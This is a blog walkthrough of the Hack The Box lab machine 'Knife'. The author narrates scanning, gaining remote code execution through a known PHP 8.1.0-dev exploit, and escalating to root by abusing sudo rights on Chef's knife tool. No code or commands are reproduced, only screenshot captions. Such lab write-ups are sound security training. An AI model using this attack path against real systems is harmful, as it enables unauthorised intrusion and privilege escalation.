026#:HTB - Knife

Knife - Title Card

     It feels like I haven’t hacked in ages at this point. Checking my post history, I haven’t done a room in over a month (since I started working on the WiFi Pineapple). Let’s see how rusty I got in that time.

Knife - Nmap

     Only two ports open. Not much to do besides starting a directory scan and begin checking out their website.

Knife - Gobuster 1
Knife - Site 1

     Our first gobuster scan didn’t return anything useful, so I resorted to just exploring the site and its source code. There was some JS in there for visual effects but I don’t think I see anything usable here. With lack of direction, I ran another gobuster scan with a larger wordlist. While that ran, I also started looking into vulns for MikroTik but didn’t find anything that applies to the version we discovered.

     I am probably missing something obvious, but after a while of getting nowhere I used the guided questions to get me back on track. Task 2 asks us about the version of PHP used. I found this info by intercepting the response in Burpsuite.

Knife - Burp 1

     I checked searchsploit for anything against ‘php 8.’ which produced a landslide of results. I ran my search again against ‘php 8.1.0-dev’ and got a more managable response.

Knife - Searchsploit 1

     One of these actually hits on the full string we provided, and it’s a RCE exploit. Seems like a good place to start. I copied the exploit to my local directory and began reviewing it. The first time it failed but then I was able to get initial access with it.

Knife - Exploit 1

     I can’t seem to change my directory but I’m able to poke around a little still. I found the first flag in the /home/james/ directory.

     I checked what sudo permissions our user has and it looks like we can run /usr/bin/knife as admin. Let’s go see what knife is.

Knife - Sudo

     The full file is tool large to fit in a single pic. I’m not entirely sure what I am looking at, but it looks like it might be a real application and not something made for this room. I started looking into knife on Linux and found this. It looks like it is a part of the Chef app, and with that in mind I can confirm mentions of Chef in the file. Now let’s try to find the version since this is probably our privilege escalation path.

     That was easy enough. I originally started looking for vulns, but then decided to try to just edit the knife file myself. This failed and I started reading more about Knife on their documentation page I linked earlier. This entry seemed like it could be abused to get us a reverse shell.

Knife - Knife Manual 1

     I grabbed pentestmonkey’s Ruby reverse shell script and tried a few times to get it to execute without luck. I decided to check GTFOBins and it turns out I was very close to getting there on my own, my syntax was wrong though. I also didn’t need to try to do a reverse shell since I could just launch a shell as root.

     This doesn’t work though and after some tinkering I am left thinking that it’s our session that is causing my issue now. I tried again for a reverse shell but ended up just making an ssh key instead.

Knife - SSH Keygen
Knife - SSH 2
Knife - SSH 3

     Now that we are back in, let’s see if our privilege escalation will work.

Knife - Flag 2

     As we see, it worked and we got our final flag. This definitely highlights the importance of stabilizing or upgrading your shell session where possible.

[CATZ....HACKS]

:::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] :::::::: [CATZ .... HACKS] ::::::::